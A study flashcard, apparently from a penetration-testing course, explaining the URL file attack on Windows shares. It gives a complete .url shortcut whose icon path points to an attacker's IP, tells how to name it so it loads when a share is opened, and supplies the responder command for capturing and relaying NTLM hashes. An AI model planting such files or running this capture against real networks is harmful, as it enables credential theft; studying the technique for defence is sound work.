URL File Attacks Flashcards
1
Q
What is URL File attack ?
A
A way to get more hash on responder.
1. Create a icon file
~~~
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\YOUR_IP\%USERNAME%.icon
IconIndex=1
~~~
2. Name it “@something” to place it in top of shared folder and autorun ressource loading
3. Run responder: responder -I eth0 -v
4. Just wait victim connect to your share
(You can relay the hash)